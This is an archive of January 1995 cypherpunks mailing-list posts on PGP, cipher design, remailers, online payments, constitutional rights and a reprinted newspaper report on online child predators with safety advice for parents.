In-Reply-To: <Pine.HPP.3.91.950110164606.5992B-100000@goshawk.csrv.uidaho.edu>
Message-ID: <WO55lKjqRey2077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.HPP.3.91.950110164606.5992B-100000@goshawk.csrv.uidaho.edu>, you wrote:

I hope they took you someplace nice for lunch...You might want to file a
FOI request on yourself, just to see how much they censor. ;) They might
think you're the ringleader, after all the FBI doesn't buy peons lunch. ;)

Sam

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
            A man wrapped up in himself makes a very small package.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 11 Jan 95 14:32:29 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <WHw4lKjqRq69077yn@mirage.skypoint.com>
Message-ID: <aa55lKjqR8T4077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501112004.PAA12969@bb.hks.net>, you wrote:

> to Haiti.  It doesn't explain the GPS, tho.  There's lots-o-speculation
> elsewhere on the net.

I wonder if this might be a response to the recent Korean downing of one of
our choppers. Hand them all a civilian GPS and say "DON'T GET LOST!!!"

Sam

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
                       Back off man, We're scientists!!!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 11 Jan 95 13:49:06 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Storm Signals
In-Reply-To: <199501111759.JAA18260@netcom10.netcom.com>
Message-ID: <9501112147.AA00447@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain



	Tim May writes:

> 
> This might explain the few thousand Green Berets being sent, if this
> is so. About the GPS, I have no idea, though it seems plausible.
> 

	According to a couple of friends who are evaluating use of GPS
for precisely locating radio transmissions the usual selective availability
dither is still turned on and there have been no public announcements
about any changes in the status of the C/A (public) part of the system.
The P code part of the system is only available to the military and
announcements about it may not be made from the usual USCG BBS that
carries stuff about the civilian signals, but they know nothing about
any change in GPS status recently, nor has there been any change
in the amount of dither or its (random) nature.

							Dave Emery






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Wed, 11 Jan 95 09:32:36 PST
To: cypherpunks@toad.com
Subject: Re: Crypto functions
In-Reply-To: <199501102230.RAA01492@bb.hks.net>
Message-ID: <Pine.SUN.3.90.950111172637.12520C-100000@vulcan.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Jan 1995, L. Todd Masco wrote:
 
> L. McCarthy noted that I didn't include sapphire,

...talking of which, is sapphire available outside of the USA?  I'd quite
like to have a look at it.

- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Jan 95 14:41:28 PST
To: cypherpunks@toad.com
Subject: Internet World on Net Security
Message-ID: <199501112240.RAA11895@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The entire issue of Internet World of February, 1995, is about Internet
security, digital cash, encryption, firewalls and more.  Here's the
contents: 
 
   Internet World 
   February, 1995 
   Volume 6 Number 2 
 
   Contents 
 
   BETTER SAFE 
   Danger lurks on the Info Highway. You must take precautions 
   to reduce your risk. 
 
   By Dave Taylor and Rosalind Resnick 
 
 
   GETTING CRYPTIC 
   Phil Zimmermann's PGP gives you powerful encryption to keep 
   your messages safe from prying eyes. Read all about it. 
 
   By William Stallings 
 
 
   SECURING THE ENTERPRISE 
   Connecting your corporation to the Internet can be a 
   security nightmare. Firewalls are the main line of defense. 
 
   By Alton Hoover  
 
 
   BEYOND THE FIREWALL 
   The latest firewall technology not only detects intruders, 
   but strikes back. 
 
   By Winn Schwartau 
 
 
   CASHING IN 
   As Internet commerce expands, a host of companies are vying 
   to establish their systems as the basis for cyberbanking 
   and credit-card transactions. 
 
   By Lisa Morgan 
 
 
   BUSINESS BROWSER 
   New versions of Mosaic with built-in encryption promise to 
   keep your transactions safe. 
 
   By Richard W. Wiggins 
 
 
   UNLAWFUL ENTRY 
   Crackers can feast on your data if you fail to plug your 
   leaky Unix system. 
 
   By Aaron Weiss 
 
 
   IT'S ALIVE! 
   Although the furor has subsided, reports of Clipper's death 
   are greatly exaggerated. The government's controversial 
   eavesdropping effort lives on. 
 
   By Steven Vaughan-Nichols 
 
 
   BUILDING TRUST 
   The chief executives of Trusted Information Systems - Steve 
   Crocker and Steve Walker - talk about encryption, 
   CyberCash, Clipper, and more. 
 
   By Jeff Ubois 
 
   ------ 
 
   On another topic, Mike Godwin's column, Law of the Net, 
   deals with "Free Speech vs. Sex Discrimination Online." 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Jan 95 14:44:36 PST
To: cypherpunks@toad.com
Subject: Mastercard Online
Message-ID: <199501112244.RAA12115@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
   The New York Times 
   January 10, 1995, D2. 
 
 
   Mastercard to Develop On-Line Standard 
 
 
   By Saul Hansell 
 
   Joining a stampede of companies that hope to profit from 
   shopping on computer networks, Mastercard International 
   said yesterday that it would develop standards for its 
   cards to be used on the Internet. 
 
   Mastercard, an association of banks that is based in New 
   York, said it would use the technology developed by the 
   Netscape Communications Corporation of Mountain View, 
   Calif., a specialist in software for the Internet, the 
   global web of computer networks. 
 
   The Internet allows a company to make information on its 
   products available to millions of computer users around the 
   world. Increasingly, companies would like to consummate 
   sales using the Internet as well, but the open nature of 
   the network may allow credit card numbers to be stolen. 
 
   "The problem with the Internet is there is no privacy and 
   no security," said Edward J. Hogan, a senior vice president 
   of Mastercard. 
 
   The Mastercard plan is one of several attempts to translate 
   credit card numbers into a code before they are sent to 
   merchants selling goods over the network and then on to the 
   credit card companies. 
 
   Visa International has said it will develop its own 
   encryption system with the Microsoft Corporation. Microsoft 
   has hinted that it may charge a fee for every transaction 
   using its system, though the details have not been 
   announced. Netscape and Mastercard say their transaction 
   standards will be openly published and free for other 
   companies to use. 
 
   Netscape's main business is selling software that allows 
   companies to publish information on the Internet. To expand 
   the market, it gives away or sells for a very small fee 
   software that allows people to view information on the 
   Internet. 
 
   The company has already included a component to encrypt 
   credit card numbers with its current version. The first 
   merchants to allow purchases using that feature will be 
   part of an electronic shopping service to be introduced by 
   the MCI Communications Corporation later this month. 
 
   The initial Netscape credit card system allows customers to 
   use any brand of card. It did not involve the cooperation 
   of credit card companies, but rather used existing rules 
   that related to mail and telephone card orders. 
 
   The agreement with Mastercard will for the first time allow 
   purchases on the Internet with automatic teller machine or 
   debit cards, which withdraw money from checking accounts. 
 
   Mastercard will likely agree to absorb the losses from 
   fraud on the system. Under the existing Netscape system, 
   merchants selling goods are liable if fraudulent card 
   numbers are used, as are companies that sell goods by mail 
   or telephone. 
 
   The debit card access and the fraud guarantee are expected 
   to be available by the fall. 
 
   End 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Wed, 11 Jan 95 14:58:08 PST
To: cypherpunks@toad.com
Subject: Multiple symetric cyphers
Message-ID: <199501112303.SAA14726@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

One of the possible weaknesses in public-key messages is their dependence
upon a particular symmetric cypher for the message with the session key
being contained in the block encrypted by the antisymmetric cypher.  IE,
if a weakness in IDEA is discovered, it can be exploited against all PGP
messages.

I'm wondering: would the strength be increased by using a randomly selected
symmetric cypher?  IE, as PGP uses IDEA and RIPEM uses DES/3DES, what if a
random cypher were selected from a set of cryptographically strong
symmetric cyphers and information about the cypher selected were encrypted
in the RSA-encrypted block?

I guess this reduces to: do strong cyphers have "signatures" of some sort,
by which the type of encryption can be derived?  And if so, can this
"signature" be reduced by including part (eg, the first and last bytes)
of the ciphertext in the RSA block rather than the "clear" cyphertext block?

Just a thought,
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxQorxNhgovrPB7dAQF+HgP/b6RVkLS0vyjpVoHy1iF8IDgH1VFwci03
ZpD4tvQ+amZ3OLfMPNvM3jV3br6+/xVKax07yP0r26jbqV3T0RCNMzKLrQjnoyep
/h+DBNfboeU4BkhhJFIayLp0w+ykJRvzWoa72l4Uzos66Nu9n/spXwBbrGYD3awe
dUUr4YzLnhU=
=xON2
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxRjjSoZzwIn1bdtAQEt2gF/bnrL7r8CycdWz5H80DLpEFGRvDFy7zfF
OQQjnGTDmdSv+d3lQOfnqP7mKJJbyqo4
=QXEU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Jan 95 15:03:46 PST
To: cypherpunks@toad.com
Subject: Cybersmut
Message-ID: <199501112303.SAA14349@pipe1.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   New York Post, January 9, 1995 
   Front Page, pp. 8, 9. Four articles. 
 
 
   A Post Investigation 
 
   Computer Sickos Target Your Kids 
 
   Child-porn perverts roam info-highway 
 
   Furor Over Cybersmut 
 
   Molesters With a Modem 
 
   Kiddie-sex perverts using computers to lure victims 
 
 
   By Lou Lumenick and Kieran Crowley 
 
   City cops are about to start patrolling the information 
   superhighway to hunt down child pornographers and 
   pedophiles who are luring kids through high-tech computer 
   bulletin boards, The Post has learned. 
 
   "The bulletin boards are a total haven for pedophiles," 
   said Sgt. Richard Perrine, who's forming a new computer 
   investigation unit. 
 
   "There are no names and faces, and a 33-year-old man can 
   pass himself off as a 10-year-old kid." Perrine said the 
   new unit, in the NYPD's Organized Crime Control Bureau, 
   plans to include computer child-pornographers and 
   pedophiles among its targets. 
 
   "We haven't really solidified our strategy yet," he told 
   The Post. 
 
   "This is something that's so new, law enforcement is not 
   quite ready for it." 
 
   Law-enforcement officials say pedophiles are lurking on the 
   nation's three major on-line services, America Online, 
   Prodigy and Compuserve, where kiddie-sex perverts are using computers 
   to lure victims -- as well as on the worldwide Internet, 
   smaller online services, and locally-operated computer 
   bulletin boards. 
 
   On-line services are an easy way for pedophiles to meet 
   children anonymously, noted Dyanne Greer, a senior lawyer 
   with the National Center for the Prosecution of Child 
   Abuse. 
 
   "Many cases are not reported, so I'm not sure anybody is 
   really aware how much this is going on," she said. 
 
   A Post probe uncovered these on-line horror stories: 
 
      Westchester computer expert George Telesha pretended to be 
      a 14-year-old girl on America Online and was quickly 
      besieged by perverts sending dirty pictures. 
 
      A Manhattan computer expert allegedly got a 13-year-old New 
      Jersey boy he met on-line to go skating with him. 
 
      Cops said the man lured the youth into the woods near the 
      boy's home and sexually abused him six times between last 
      July and September. 
 
      An unemployed Brooklyn computer programmer tried to 
      sodomize a Nevada teen-ager he met on a computer bulletin 
      board. 
 
      A 27-year-old computer engineer in Cupertino, Calif., 
      allegedly met a 14-year-old boy through America Online. 
 
      He is charged with handcuffing, shackling and blindfolding 
      the boy and then taking him to his apartment, where he 
      whipped him with a belt, shaved his pubic hair and had sex 
      with him. 
 
      A California man sent pornographic photos via computer to a 
      teen-ager, then sought to have the teen killed to silence 
      him. 
 
   Such crimes are not easy to investigate or prosecute, 
   officials note. 
 
   "It's a bigger problem than most people realize," said Mike 
   Brick, director of the Orlando bureau of the Florida State 
   Office of Law Enforcement. 
 
   "There's a lot of people out there who want to have sex 
   with children. If they hang out at a real playground, a 
   teacher or someone might see them. In the computer 
   playground they can more or less hide in the bushes." 
 
   A handful of agencies have staffers pose as youngsters to 
   solicit dirty pictures and come-ons, but many don't have 
   the manpower, equipment or inclination to do so on a 
   regular basis. 
 
   And even if they did, experts say there's probably no way 
   to completely stop on-line perverts -- who constitute a 
   tiny fraction of overall on-line communicators -- short of 
   shutting down the services. 
 
   And that is not only unlikely, but would rob children and 
   others of a valuable educational resource. 
 
   The services say they're concerned -- but in no position to 
   play the role of police. 
 
   AOL spokeswoman Pam McGraw said computer-privacy laws keep 
   her company's hands tied when it comes to the 
   person-to-person type of communication in which porn can be 
   exchanged in electronic "private chat rooms." 
 
   "Federal law prevents us from monitoring E-mail," McGraw 
   said. "We do our best to prevent misuse of our service." 
 
   She urged AOL customers to report offensive communications 
   -- which are prohibited under company rules -- so the 
   company can warn offenders or eject them from the system. 
 
   Law-enforcement officials say on-line companies are quick 
   to cut off perverts and help track down and prosecute 
   pedophiles and pornographers. 
 
   But the crimes still flourish because computers make life 
   simpler for the perverts. 
 
   Pedophiles can easily pretend to be a child online, or even 
   someone of the opposite sex, to help draw a child into a 
   trap. And they can elude detection by using false names and 
   post office boxes. 
 
   "Offenders can say they're other kids, then arrange for 
   face-to-face meetings," Greer said. "It's pretty scary when 
   you find out you're dealing with a 47-year-old man instead 
   of the 14-year-old you expected." 
 
   Greer said some pedophiles have convinced children to pose 
   for pornographic pictures. The pedophiles then trade the 
   pictures with other perverts, or use the pictures to draw 
   in other kids "and break down their inhibitions," she said. 
 
   End Article 1 
 
 
   Article 2 
 
   Photo: 
   CREEP CATCHERS: Special agent Mike Brick (white shirt) of 
   the Florida state police and another agent track a 
   pedophile on the computer. 
 
   How to protect your children 
 
   Steps parents can take to stop on-line pedophiles 
 
   By Lou Lumenick 
 
   Parents must take the offensive to protect their children 
   from on-line perverts, experts say. 
 
   "You wouldn't let a young child hang out in a playground or 
   mall alone, so don't let them hang out in the computer 
   playground by themselves," said Mike Brick of the Florida 
   Department of Law Enforcement. "You need to exercise the 
   same caution." 
 
   So what can a parent do? First of all, experts say, talk 
   with someone at your on-line system -- whether it's America 
   Online, Prodigy, Compuserve, Genie, Delphi or one of the 
   others. 
 
   All of them allow users to limit access by children. 
 
   Subscribers to America Online, for instance, can bar their 
   children from the private "chat rooms," where the more 
   sexually explicit conversations take place. 
 
   Most services will also allow you to disable one-on-one 
   conversations when your child logs on. 
 
   Then talk with your children. 
 
   Rule No. 1 is that they must never ever give their real 
   name, address or telephone number to anyone on-line. 
 
   Rule No. 2 is that they must never ever agree to meet with 
   anyone they encounter on-line -- even if he says he's a kid 
   the same age who lives across the street. He could very 
   well be an adult willing to travel hundreds of miles for a 
   sexual encounter. 
 
   Beyond that, it's a matter of parental vigilance. 
 
   "Make the kids teach you how to use the computer," said 
   Dyanne Greer, a senior lawyer with the National Center for 
   the Prosecution of Child Abuse. 
 
   "Many parents take the attitude, 'Gee, my kids are learning 
   a skill.' That's very true, but you can't be left behind or 
   you won't know what's going on." 
 
   Many experts recommend moving the computer out of the kids' 
   bedroom into a more central place -- like the living room 
   -- so parents can keep a closer eye on things. 
 
   "If your kid wants to put the computer in his bedroom 
   closet, I would be very nervous," Brick said. 
 
   "If you find your children spending a lot of time on the 
   service, you need to pay attention. If every time you walk 
   into the room, the screen goes dark, check it out. It could 
   be the modern equivalent of kids under the cover with a 
   flashlight reading Uncle Harry's Playboy magazine. Or 
   worse." 
 
   Brick said telltale signs of porn being downloaded include: 
 
   "If you have a 100-megabyte drive and it's always full and 
   the kids are demanding more memory. Photos can take a lot 
   of memory." 
 
   "If you find floppy disks hidden around the house." 
 
   "If you need help playing them or figuring out whether 
   there's a problem, go to your local police department. Most 
   will be happy to help." 
 
   End Article 2 
 
 
   Article 3 
 
   Chilling messages made dad take action 
 
   By Kieran Crowley 
 
   George Telesha couldn't believe his ears. Or his modem. 
 
   Telesha, 46, a bank computer specialist and president of 
   the Westchester chapter of the Fathers Rights Association, 
   heard from several dads that their kids were accessing porn 
   on their home computers. 
 
   So he decided to take a walk on the wild side -- on the 
   information superhighway. 
 
   Telesha, the father of two, pretended to be a 14-year-old 
   girl named "Suzy" on an America Online computer bulletin 
   board. 
 
   He said he was besieged with perverts who sent dirty 
   pictures. 
 
   Telesha said several men sent "Suzy" porno pictures, tried 
   to get her address and phone number -- and tried to lure 
   her out of her home. 
 
   "Can I come up to New York?" one out-of-state man said. 
   "Can I meet you? You don't have to tell your parents." 
 
   When "Suzy" mentioned her parents were not home, another 
   man became very insistent, Telesha said. 
 
   "I live in New York. Can I come over? I'll take you 
   shopping," the man messaged "Suzy" in trying to set up a 
   date at a local mall. 
 
   One man said he lived in New Jersey and invited "Suzy" over 
   for a photo session. 
 
   Telesha said his most disturbing exchange was with a man 
   who sent child sex pictures. 
 
   "Do you have any more of these?" Telesha asked. 
 
   "Usually, it's just one session," the man typed back. 
 
   "That sent chills through me," said Telesha, fearing the 
   photographed children may have been harmed. 
 
   "It's mind-boggling. I haven't slept in a week. What 
   happened to the children in these pictures? What is going 
   to happen to them?" 
 
   One AOL subscriber even offered hints on how to pick up 
   young girls and take pornographic pictures of them, Telesha 
   said. 
 
   "I think people ought to know what's going on. I just want 
   to see it stopped," he said. 
 
   End Article 3 
 
 
   [Article 4 reports on exchanges between Telesha 
   masquerading as three different girls and AOL subscribers.  
   Too disgusting to post.  Censorship imposed for lurking 
   kiddies.] 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Wed, 11 Jan 95 16:41:14 PST
To: pstemari@erinet.com (Paul J. Ste. Marie)
Subject: Re: Pornography, What is it?
In-Reply-To: <9501112356.AA02726@eri.erinet.com>
Message-ID: <199501120029.SAA00164@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> At 11:33 PM 1/10/95, Timothy C. May wrote:
> > ... I'm  not a lawyer, and it's been 25 years since I was in a "civics"
> >class, so I'm sorry to not recall the precise language by which
> >"Congress shall make no law" also is taken to apply to Sacramento,
> >Albany, Austin, and so forth.
> 
> The 14th Amendment extended the restrictions that the Bill of Rights place 
> on the Federal Gov't to the state gov'ts.
>  
> 
>     --Paul J. Ste. Marie
>       pstemari@well.sf.ca.us, pstemari@erinet.com
> 
Article XIV (1868)

Sec. 1.

All persons  born or naturalized in the United States, and subject to the 
jurisdiction thereof, are citizens of the United States and of the States
wherein they reside. No state shall make or enforce any law which shall
abridge the privileges or immunities of citizens of the United States;
nor shall any State deprive any person of life, liberty, or property,
without due process of law; nor deny to any person within its jurisdiction
the equal protection of the laws.

Where in there is the protection you speak of? I see no guarantee of my 
Constitutional rights, only of privileges and immunities as granted
by the federal government. 

The 1st Amendment says:

Article 1 (1791)

Congress shall make no law respecting an establishment of religion, or 
prohibiting the free exercise thereof; or abridging the freedom of speech,
or of the press; or the right of the people to assemble, and to petition
the government for a redress of grievances.

Let's examine the first part of this article. Since Congress is prohibited 
from making any law (ie no law) respecting religion it follows they don't
even get the opportunity to define religion. When one considers the Supreme
Court's view of Rastafarians, Coptics, and the Native American Church it is 
clear they are making laws respecting an establishment of religion. It is
also clear they are prohibiting the free exercise thereof as well.

The attacks on freedom of speech are quite clear and I won't go into them.

The last part is quite irrelevant since as citizens we can't even sue the
government in civil court without first getting its permission. Not what
I would call supporting our rights to redress of grievances.

Article IV (1791)

The right of the people to be secure in their persons, houses, papers, and 
effects, against unreasonable searches and seizures, shall not be violated,
and no warrants shall issue, but upon probable cause, supported by oath
or affirmation, and particularly describing the place to be searched, and 
the persons or things to be seized.

Have you ever heard of the DoJ Forfeiture Super Fund?

Why do courts allow law enforcement to act upon anonymous tips when no 
oath or affirmation is given in such a case? 

Article V (1791)

No person shall be held to answer for a capital, or otherwise infamous crime,
unless on a presentment or indictment of a grand jury, except in cases 
arising in the land or naval forces, or in the militia, when in actual service
in time of war or public danger; nor shall any person be subject for the    
same offence to be twice put in jeopardy of life or limb; nor shall be
compelled in any criminal case to be a witness against himself, nor deprived
of life, liberty, or property, without due process of law; nor shall private
property be taken for public use, without just compensation.

The last sentence is the most commonly broken aspect of this amendment.

A strong case could be made that breathalyzer, blood tests, and such also
violate the spirit and letter of this article.

Article VI (1791)

In all criminal prosecutions, the accused shall enjoy the right to a speedy
and public trial, by an impartial jury of the State and district wherein the
crime shall have been committed, which district shall have been previously 
ascertained by law, and to be informed of the nature and cause of the 
accusation; to be confronted with the witnesses against him; to have
compulsory process for obtaining witnesses in his favor, and to have the
assistance of counsel for his defence.

Seems to me that according to this anonymous witnesses should not be allowed
in any case. Since he also has a right to a public trial the court does not
have the power to exclude the press or public. 

Article IX (1791)

The enumeration in the Constitution, of certain rights shall not be construed
to deny or disparage others retained by the people.

This article states quite clearly and simply that if there is any doubt as
to whether it is a right the resolution shall be found in favor of the people.

Article X (1791)

The powers not delegated to the United States by the Constitution, nor 
prohibited by it to the States, are reserved to the States, or to the people.

This article states clearly that if it isn't in this document the federal 
government has no claim to it. The only way they may get such powers is
through due process, namely constitutional amendments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 11 Jan 95 15:50:04 PST
To: cypherpunks@toad.com
Subject: Re: Remailer traffic loads?
Message-ID: <199501112355.SAA15222@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Is there someplace that remailer operators routinely post information
> about traffic load?

Remailers operating Matt Ghio's or Lance Cottrell's software should autoreply
to a message with "Subject: remailer-stats" with a bar chart indicating the
number of messages remailed in each of the past 24 hours.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxRvwioZzwIn1bdtAQFdEQF/dTXM3ii1pAHUV108kMx8N3urhv/HAHQc
IZHLEqfOcNTDaV6ZrDxuT+0AZzhdu8rL
=ZKwP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 16:11:43 PST
To: root@einstein.ssz.com (root)
Subject: Re: Pornography, What is it?
Message-ID: <9501112356.AA02726@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:33 PM 1/10/95, Timothy C. May wrote:
> ... I'm  not a lawyer, and it's been 25 years since I was in a "civics"
>class, so I'm sorry to not recall the precise language by which
>"Congress shall make no law" also is taken to apply to Sacramento,
>Albany, Austin, and so forth.

The 14th Amendment extended the restrictions that the Bill of Rights place 
on the Federal Gov't to the state gov'ts.
 

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 16:06:04 PST
To: John Draper <cypherpunks@toad.com
Subject: Re: Getting on the list
Message-ID: <9501112357.AB02726@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:55 AM 1/11/95 -0800, John Draper wrote:
> ... I tried the usual request to cypherpunks-request@toad.com,   but haven't
>been successful.
>
>Who is maintaining the list these days?   Does it still exist?  And
>why haven't any of my requests been honored?

Cypherpunks uses the majordomo software.  Try sending a message to 
majordomo@toad.com containing the following two lines:

help
subscribe cypherpunks

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@io.com (Jim McCoy)
Date: Wed, 11 Jan 95 17:00:07 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
In-Reply-To: <199501112337.PAA20199@jobe.shell.portal.com>
Message-ID: <199501120100.TAA16301@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


From some anonymous dude:
> > 
> > Military action also requires political will, and with the recent change
> > in power in the US govt there is no way anything is going to happen for at
> > least six months.  Freshmen congressmen do not sign off on a war the first
> 
> 
> True.  But clandestine operations don't require the approval of 
> Congress.  In fact, the prez never has to admit they exist.  Ever.  Read 
> the Pentagon Papers.

The president needs the approval of the ranking members of the Senate
Intelligence Oversight committee (I think that is the one), and there is at
least one republican among them...  Anyway, several thousand Green Berets
does not a clandestine operation make.  Secret wars are a bitch to pull
off, and with a president with the lack of backbone such as Clinton they
are not going to happen in the next two years.

jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Draper <crunch@well.sf.ca.us>
Date: Wed, 11 Jan 95 19:17:34 PST
To: cypherpunks@toad.com
Subject: Finally got on
Message-ID: <199501120317.TAA07919@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


I finally got on...  I actually didn't get that swamped, but certainly I
couldn't be expected to know that cypherpunks-request was defunct.  Oh
well.  Now that I'm on, I was wondering if anyone would let me know the
status of Phil Zimmermann's case, and where I can extract any info.  I've
heard reports that the Govt. was planning to press charges.  Just getting
back on here again, I'm not in the know of these things, but can now
handle large amounts of mail.  I'm also interested in knowing how I can
help in Phil's defence case.  Where do people mail checks to Phil's
defence fund?

Anyway, glad to be back up here again....  And a big fat HAPPY NEW YEAR
to all of you Cypherpunk folks!!  And Oh Yea!!  Hi Brad, glad to make
your acquaintance...  Yup!  The WELL was sure hosed today....  I'm just
now getting mail that's backed up now for the 4 days I've been without
power.

There is ONE disadvantage of living out in the country....  Power can be
a tad flaky.  We've just got our power turned on today....  Yay!!!  When
I returned from MacWorld, things were really dark up here.  :-)

Cheers
C. Crunch

PS = Scuse the formatting, I STILL cannot get Microphone to not
automatically word wrap.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 11 Jan 95 19:55:31 PST
To: marko@millcomm.com (Mark Oeltjenbruns)
Subject: Re: How do I know if its encrypted?
In-Reply-To: <m0rSFsb-000kfuC@mill2.millcomm.com>
Message-ID: <199501120337.TAA13574@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark Oeltjenbruns wrote:

>         I keep seeing the idea that to keep out of trouble remailers and
> Data Havens should require that data be encrypted before it is accepted.
> My question is how do I know it is encrypted?  If I say that anyone sending
> me data to be massaged by my system must first encrypt it, how do I know
> they are in fact complying with that request?  After all this is the area
> for the paranoids to hang out in.

> (1) Look at the incoming data, which of course would be impractical and
> defeat the whole idea.

Actually, no. If the remailed material is encrypted, then looking at
it is harmless. (And if it is not....) The "ideal mix" neither looks
at nor keeps records about remailed items, of course. The "nonideal
mix" may easily insist on encryption.

I won't go through the rest of the points here, but there's a key word
here: entropy. Get familiar with it now (and not just 50 years from
now, when the worms and the bacteria will be giving lectures).

Abstractly, it is not possible to ever prove that a file is either
encrypted or unencrypted. Practically, encrypted files have high
entropy per character (characters appear with approximately equal
frequency), while unencrypted files have relatively low entropy,
reflecting the patterns and n-tuple clusterings in ordinary languages.

Sophisticated entropy measures are available, and have been discussed
here. But there's an easier approach: try to compress the file.

An encrypted ( = high entropy) file will generally not compress, and
may even expand in size. An ordinary message in English or Dutch or
whatever, such as this one, will compress significantly, to perhaps
half its uncompressed size. (Quibblers, this is the place where you
announce the precise compression seen...)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@hawksbill.sprintmrn.com (Paul Ferguson)
Date: Wed, 11 Jan 95 16:47:14 PST
To: jya@pipeline.com (John Young)
Subject: Re: Internet World on Net Security
In-Reply-To: <199501112240.RAA11895@pipe1.pipeline.com>
Message-ID: <9501120046.AA25595@hawksbill.sprintmrn.com>
MIME-Version: 1.0
Content-Type: text



> 
> The entire issue of Internet World of February, 1995, is about Internet
> security, digital cash, encryption, firewalls and more.  Here's the
> contents: 
>  

Most of them were _very_ cursory, geared more towards the neophyte.
In fact, some of them were actually misleading, especially the
article on firewalls.

- paul


_______________________________________________________________________________
Paul Ferguson                         
US Sprint                                          tel: 703.689.6828
Managed Network Engineering                   internet: paul@hawk.sprintmrn.com
Reston, Virginia  USA                             http://www.sprintmrn.com 



